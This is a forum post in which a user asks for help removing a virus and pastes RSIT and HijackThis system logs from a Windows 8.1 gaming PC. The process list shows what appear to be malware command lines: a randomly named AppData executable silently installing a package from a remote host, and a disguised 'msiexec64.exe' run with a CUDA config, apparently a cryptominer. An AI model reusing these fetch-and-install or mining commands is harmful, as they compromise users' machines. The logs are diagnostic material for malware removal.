Please help me remove a virus

Kate34 (Guest; posts: 3; registered: 25 Aug 2018 18:03)

#1 Post by Kate34 »

Avast reports several times a day that it has detected a threat and moved it to the Virus Chest.
[Attachment: Avast Printscrenn.jpg]


Logfile of random's system information tool 1.10 (written by random/random)
Run by eciO at 2018-08-25 18:56:57
Microsoft Windows 8.1
System drive C: has 19 GB (17%) free of 114 GB
Total RAM: 8135 MB (64% free)

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 18:57:09, on 25. 8. 2018
Platform: Unknown Windows (WinNT 6.02.1008)
MSIE: Internet Explorer v11.0 (11.00.9600.19036)
Boot mode: Normal

Running processes:
C:\Program Files\AVAST Software\Avast\AvastUI.exe
D:\Hry\Steam\Steam.exe
C:\Program Files (x86)\uRage Illuminated Driver\Monitor.exe
C:\Program Files (x86)\Common Files\Overwolf\0.118.1.8\OverwolfHelper.exe
D:\Hry\Steam\bin\cef\cef.win7\steamwebhelper.exe
D:\Hry\Steam\bin\cef\cef.win7\steamwebhelper.exe
D:\Hry\Steam\bin\cef\cef.win7\steamwebhelper.exe
D:\Hry\Steam\bin\cef\cef.win7\steamwebhelper.exe
D:\Hry\Steam\bin\cef\cef.win7\steamwebhelper.exe
C:\Users\eciO\AppData\Local\uNUorUVyYOqO.exe
C:\Windows\syswow64\MsiExec.exe
C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\svchost.exe
C:\Program Files\trend micro\eciO.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.seznam.cz/?clid=29530
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/p/?LinkId=255141
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/p/?LinkId=255141
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: Lync Click to Call BHO - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll
O2 - BHO: avast! Online Security - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll
O4 - HKLM\..\Run: [Dare-U mouse] "C:\Program Files (x86)\uRage Illuminated Driver\Monitor.exe"
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKCU\..\Run: [Overwolf] C:\Program Files (x86)\Overwolf\OverwolfLauncher.exe -overwolfsilent
O4 - HKCU\..\Run: [Skype for Desktop] C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
O4 - HKCU\..\Run: [Steam] "D:\Hry\Steam\steam.exe" -silent
O4 - HKCU\..\Run: [EpicGamesLauncher] "C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe" -silent
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE/3000
O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: Se&nd to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\ONBttnIE.dll
O9 - Extra button: Lync Click to Call - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll
O9 - Extra 'Tools' menuitem: Lync Click to Call - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll
O9 - Extra button: OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\ONBttnIELinkedNotes.dll
O9 - Extra 'Tools' menuitem: OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\ONBttnIELinkedNotes.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O18 - Protocol: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL
O18 - Protocol: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL
O18 - Protocol: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL
O18 - Protocol: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL
O18 - Filter hijack: text/xml - {807583E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLMF.DLL
O23 - Service: ArcSoft Connect Daemon (ACDaemon) - ArcSoft Inc. - C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: aswbIDSAgent - AVAST Software - C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe
O23 - Service: Avast Antivirus (avast! Antivirus) - AVAST Software - C:\Program Files\AVAST Software\Avast\AvastSvc.exe
O23 - Service: BattlEye Service (BEService) - Unknown owner - C:\Program Files (x86)\Common Files\BattlEye\BEService.exe
O23 - Service: EasyAntiCheat - EasyAntiCheat Ltd - C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: Služba Google Update (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Služba Google Update (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\Windows\system32\IEEtwCollector.exe (file missing)
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: MSI_Trigger_Service - MICRO-STAR INTERNATIONAL CO., LTD. - C:\Program Files (x86)\MSI\MSITrigger\MSI_Trigger_Service.exe
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: NVIDIA Display Container LS (NVDisplay.ContainerLocalSystem) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
O23 - Service: NVIDIA Telemetry Container (NvTelemetryContainer) - NVIDIA Corporation - C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
O23 - Service: Overwolf Updater Windows SCM (OverwolfUpdater) - Overwolf LTD - C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: CamMonitor (uCamMonitor) - ArcSoft, Inc. - C:\Program Files (x86)\ArcSoft\Magic-i Visual Effects 2\uCamMonitor.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: SHAREit Hotspot Service (uSHAREitSvc) - SHAREit Technologies Co.Ltd - C:\Program Files (x86)\SHAREit Technologies\SHAREit\SHAREit.Service.exe
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-320 (WdNisSvc) - Unknown owner - C:\Program Files (x86)\Windows Defender\NisSrv.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-310 (WinDefend) - Unknown owner - C:\Program Files (x86)\Windows Defender\MsMpEng.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 9860 bytes

======Listing Processes======





wininit.exe

winlogon.exe


C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
"dwm.exe"
"C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k LocalService
"C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -f "C:\ProgramData\NVIDIA\DisplaySessionContainer%d.log" -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\Session" -r -l 3 -p 30000 -c
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k NetworkService

C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\System32\svchost.exe -k utcsvc
dashost.exe {264590bd-b37e-4380-87e0180d92fe2c5a}
"C:\Program Files (x86)\MSI\MSITrigger\MSI_Trigger_Service.exe"
"C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\plugin"
C:\Windows\system32\svchost.exe -k imgsvc
"C:\Program Files (x86)\ArcSoft\Magic-i Visual Effects 2\uCamMonitor.exe"
C:\Windows\system32\wbem\wmiprvse.exe
taskhostex.exe
C:\Windows\Explorer.EXE
C:\Windows\System32\skydrive.exe -Embedding
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation

"C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe" -s
AvastUI.exe /nogui
"C:\Program Files (x86)\Overwolf\OverwolfLauncher.exe" -overwolfsilent -silent
C:\Windows\system32\SearchIndexer.exe /Embedding
"D:\Hry\Steam\Steam.exe" -silent
"C:\Program Files (x86)\Overwolf\0.118.1.8\OverwolfBrowser.exe" --type=crashpad-handler --no-rate-limit --max-db-size=10 --max-db-age=5 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\eciO\AppData\Local\Overwolf\User Data\Crashpad" "--metrics-dir=C:\Users\eciO\AppData\Local\Overwolf\User Data" --url=http://localhost:54286 --annotation=platform=win64 --annotation=product=Overwolf --annotation=version=0.118.1.8 --initial-client-data=0xb84,0xb8c,0xb90,0xb88,0xb94,0x7ffd1544bc48,0x7ffd1544bc58,0x7ffd1544bc68
"C:\Program Files (x86)\uRage Illuminated Driver\Monitor.exe"
"C:\Program Files (x86)\Overwolf\0.118.1.8\OverwolfBrowser.exe" --type=gpu-process --disable-features=TouchpadAndWheelScrollLatching --no-sandbox --locales-dir-path="C:\Program Files (x86)\Overwolf\0.118.1.8\Locales" --log-file="C:\Users\eciO\AppData\Local\Overwolf\Log\OverwolfCEF_4876.log" --log-severity=error --user-agent="Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OverwolfClient/0.118.1.8" --lang=cs-CZ --ignore-certificate-errors --ow-process-id=4876 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --gpu-vendor-id=0x10de --gpu-device-id=0x1401 --gpu-driver-vendor=NVIDIA --gpu-driver-version=23.21.13.8813 --gpu-driver-date=10-27-2017 --locales-dir-path="C:\Program Files (x86)\Overwolf\0.118.1.8\Locales" --log-file="C:\Users\eciO\AppData\Local\Overwolf\Log\OverwolfCEF_4876.log" --log-severity=error --user-agent="Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OverwolfClient/0.118.1.8" --lang=cs-CZ --ignore-certificate-errors --ow-process-id=4876 --service-request-channel-token=62AA04EAA2D2486CF9E9C8634AC8D56D --mojo-platform-channel-handle=3580 /prefetch:2
"C:\Windows\System32\SettingSyncHost.exe" -Embedding
"C:\Program Files (x86)\Common Files\Overwolf\0.118.1.8\OverwolfHelper.exe" "path=C:\Program Files (x86)\Overwolf\0.118.1.8\win32\OWExplorerLauncher.dll
"C:\Program Files (x86)\Common Files\Overwolf\0.118.1.8\OverwolfHelper64.exe" "path=C:\Program Files (x86)\Overwolf\0.118.1.8\OWExplorerLauncher.dll
D:\Hry\Steam\bin\cef\cef.win7\steamwebhelper.exe "-lang=cs_CZ" "-cachedir=C:\Users\eciO\AppData\Local\Steam\htmlcache" "-steampid=5468" "-buildid=1533766730" "-steamid=0" "-clientui=D:\Hry\Steam\clientui" --disable-spell-checking --disable-out-of-process-pac --enable-blink-features=ResizeObserver,Worklet,AudioWorklet --disable-features=TouchpadAndWheelScrollLatching,AsyncWheelEvents --enable-media-stream --disable-smooth-scrolling --disable-gpu-compositing --disable-gpu --enable-direct-write "--log-file=D:\Hry\Steam\logs\cef_log.txt"
C:\Windows\system32\wbem\unsecapp.exe -Embedding
"C:\Program Files (x86)\Common Files\Steam\SteamService.exe" /RunAsService
D:\Hry\Steam\bin\cef\cef.win7\steamwebhelper.exe --type=crashpad-handler /prefetch:7 --max-uploads=5 --max-db-size=20 --max-db-age=5 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\eciO\AppData\Local\CEF\User Data\Crashpad" "--metrics-dir=C:\Users\eciO\AppData\Local\CEF\User Data" --url=http://crash.steampowered.com/submit --annotation=platform=win32 --annotation=product=cefwebhelper --annotation=version=1.0 --initial-client-data=0x25c,0x260,0x264,0x258,0x268,0x6c4f86f0,0x6c4f8700,0x6c4f870c
"D:\Hry\Steam\bin\cef\cef.win7\steamwebhelper.exe" --type=renderer --disable-features=AsyncWheelEvents,TouchpadAndWheelScrollLatching --disable-gpu-compositing --service-pipe-token=D45380E43B52C3E18578E7675120A4BD --enable-blink-features=ResizeObserver,Worklet,AudioWorklet --lang=en-US --log-file="D:\Hry\Steam\logs\cef_log.txt" --product-version="Valve Steam Client" --webview-urls=http://localhost/*,http://steamloopback ... localhost/* --disable-spell-checking --buildid=1533766730 --steamid=0 --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=D45380E43B52C3E18578E7675120A4BD --renderer-client-id=2 --mojo-platform-channel-handle=1612 /prefetch:1
"D:\Hry\Steam\bin\cef\cef.win7\steamwebhelper.exe" --type=gpu-process --disable-features=AsyncWheelEvents,TouchpadAndWheelScrollLatching --log-file="D:\Hry\Steam\logs\cef_log.txt" --product-version="Valve Steam Client" --webview-urls=http://localhost/*,http://steamloopback ... localhost/* --lang=cs-CZ --buildid=1533766730 --steamid=0 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x10de --gpu-device-id=0x1401 --gpu-driver-vendor=NVIDIA --gpu-driver-version=23.21.13.8813 --gpu-driver-date=10-27-2017 --log-file="D:\Hry\Steam\logs\cef_log.txt" --product-version="Valve Steam Client" --webview-urls=http://localhost/*,http://steamloopback ... localhost/* --lang=cs-CZ --buildid=1533766730 --steamid=0 --service-request-channel-token=C501D5581A458DD32E87FDD1F53E07E6 --mojo-platform-channel-handle=1628 --ignored=" --type=renderer " /prefetch:2
"D:\Hry\Steam\bin\cef\cef.win7\steamwebhelper.exe" --type=renderer --disable-features=AsyncWheelEvents,TouchpadAndWheelScrollLatching --disable-gpu-compositing --service-pipe-token=87E2EBE397EB58C25171B757BF5D880D --enable-blink-features=ResizeObserver,Worklet,AudioWorklet --lang=en-US --log-file="D:\Hry\Steam\logs\cef_log.txt" --product-version="Valve Steam Client" --webview-urls=http://localhost/*,http://steamloopback ... localhost/* --disable-spell-checking --buildid=1533766730 --steamid=0 --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=87E2EBE397EB58C25171B757BF5D880D --renderer-client-id=4 --mojo-platform-channel-handle=2124 /prefetch:1
"C:\Program Files\Windows Media Player\wmpnetwk.exe"
taskhost.exe $(Arg0)
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\eciO\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\eciO\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\eciO\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=68.0.3440.106 --initial-client-data=0x11c,0x120,0x124,0x118,0x128,0x7ffd40f024d0,0x7ffd40f024e0,0x7ffd40f024f0
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=1500 --on-initialized-event-handle=484 --parent-handle=492 /prefetch:6
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1248,16953087833198166629,17646245723153791375,131072 --gpu-preferences=KAAAAAAAAACAAwBAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=57EEF75CAD87D16A240C0C26F984ABC4 --mojo-platform-channel-handle=1256 --ignored=" --type=renderer " /prefetch:2
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1248,16953087833198166629,17646245723153791375,131072 --service-pipe-token=5B86496AED7B87D82F1052AEBC2F8670 --lang=cs --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=5B86496AED7B87D82F1052AEBC2F8670 --renderer-client-id=3 --mojo-platform-channel-handle=2508 /prefetch:1
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1248,16953087833198166629,17646245723153791375,131072 --service-pipe-token=FCD14350A427810DE7690CB6B0289B84 --lang=cs --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=FCD14350A427810DE7690CB6B0289B84 --renderer-client-id=4 --mojo-platform-channel-handle=2828 /prefetch:1
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1248,16953087833198166629,17646245723153791375,131072 --service-pipe-token=C2C0FE471223E7C5C11DE2AE64350B46 --lang=cs --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=C2C0FE471223E7C5C11DE2AE64350B46 --renderer-client-id=5 --mojo-platform-channel-handle=2984 /prefetch:1
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1248,16953087833198166629,17646245723153791375,131072 --service-pipe-token=EA1BB1E83EBFCBC496F0C530FA4A28CC --lang=cs --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=EA1BB1E83EBFCBC496F0C530FA4A28CC --renderer-client-id=27 --mojo-platform-channel-handle=4828 /prefetch:1
C:\Users\eciO\AppData\Local\uNUorUVyYOqO.exe /q /i http://lg-static.com/ovuziuzckaqp.okk
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe -Embedding 05037434C2F4296EA4D06959CEC909DC
\??\C:\Windows\system32\conhost.exe 0x4
"C:\Windows\SysWOW64\resources.bin" "-n" "msiexec64.exe"
"C:\Users\eciO\AppData\Local\UserData.db\msiexec64.exe" --config "C:\Users\eciO\AppData\Local\UserData.db\cuda.cfg"
\??\C:\Windows\system32\conhost.exe 0x4
"C:\Windows\SysWOW64\svchost.exe"
"C:\Windows\SysWOW64\svchost.exe" --config="C:\Users\eciO\AppData\Local\Temp\[3C2253]"
\??\C:\Windows\system32\conhost.exe 0x4

"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1248,16953087833198166629,17646245723153791375,131072 --service-pipe-token=421BC6D01111BDDE21F46F2FB4F38AB3 --lang=cs --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=421BC6D01111BDDE21F46F2FB4F38AB3 --renderer-client-id=47 --mojo-platform-channel-handle=6044 /prefetch:1
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1248,16953087833198166629,17646245723153791375,131072 --service-pipe-token=EB2A7DA0173E91711DC680C282E67084 --lang=cs --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=EB2A7DA0173E91711DC680C282E67084 --renderer-client-id=49 --mojo-platform-channel-handle=7136 /prefetch:1
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe15_ Global\UsGthrCtrlFltPipeMssGthrPipe15 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
"C:\Windows\system32\SearchFilterHost.exe" 0 572 576 584 65536 580
"D:\Users\eciO\Downloads\RSITx64.exe"

======Registry dump======

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8E5E2654-AD2D-48bf-AC2D-D17F00898D06}]
avast! Online Security - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2018-08-05 938712]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}]
Skype for Business Browser Helper - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll [2018-08-17 152104]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8E5E2654-AD2D-48bf-AC2D-D17F00898D06}]
avast! Online Security - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2018-08-05 812248]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"RTHDVCPL"=C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [2014-11-26 7659736]
"AvastUI.exe"=C:\Program Files\AVAST Software\Avast\AvLaunch.exe [2018-07-19 242904]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Overwolf"=C:\Program Files (x86)\Overwolf\OverwolfLauncher.exe [2018-08-15 1501000]
"Skype for Desktop"=C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe [2018-08-01 49703256]
"Steam"=D:\Hry\Steam\steam.exe [2018-08-09 3206432]
"EpicGamesLauncher"=C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [2018-07-27 32973712]

[HKEY_LOCAL_MACHINE\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run]
"Dare-U mouse"=C:\Program Files (x86)\uRage Illuminated Driver\Monitor.exe [2013-01-17 491520]
"Adobe ARM"=C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-03-28 1160408]

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
"msacm.l3acm"=C:\Windows\System32\l3codeca.acm
"VIDC.YUY2"=msyuv.dll
"vidc.i420"=iyuv_32.dll
"msacm.msgsm610"=msgsm32.acm
"msacm.msg711"=msg711.acm
"VIDC.YVYU"=msyuv.dll
"VIDC.YVU9"=tsbyuv.dll
"wavemapper"=msacm32.drv
"midimapper"=midimap.dll
"VIDC.UYVY"=msyuv.dll
"VIDC.IYUV"=iyuv_32.dll
"vidc.mrle"=msrle32.dll
"msacm.imaadpcm"=imaadp32.acm
"msacm.msadpcm"=msadp32.acm
"vidc.msvc"=msvidc32.dll
"wave2"=wdmaud.drv
"midi2"=wdmaud.drv
"mixer2"=wdmaud.drv
"wave"=wdmaud.drv
"midi"=wdmaud.drv
"mixer"=wdmaud.drv
"aux"=wdmaud.drv
"wave1"=wdmaud.drv
"midi1"=wdmaud.drv
"mixer1"=wdmaud.drv
"wave3"=wdmaud.drv
"midi3"=wdmaud.drv
"mixer3"=wdmaud.drv
"wave4"=wdmaud.drv
"midi4"=wdmaud.drv
"mixer4"=wdmaud.drv
"MSVideo8"=VfWWDM32.dll
"wave5"=wdmaud.drv
"midi5"=wdmaud.drv
"mixer5"=wdmaud.drv
"aux1"=wdmaud.drv

======File associations======

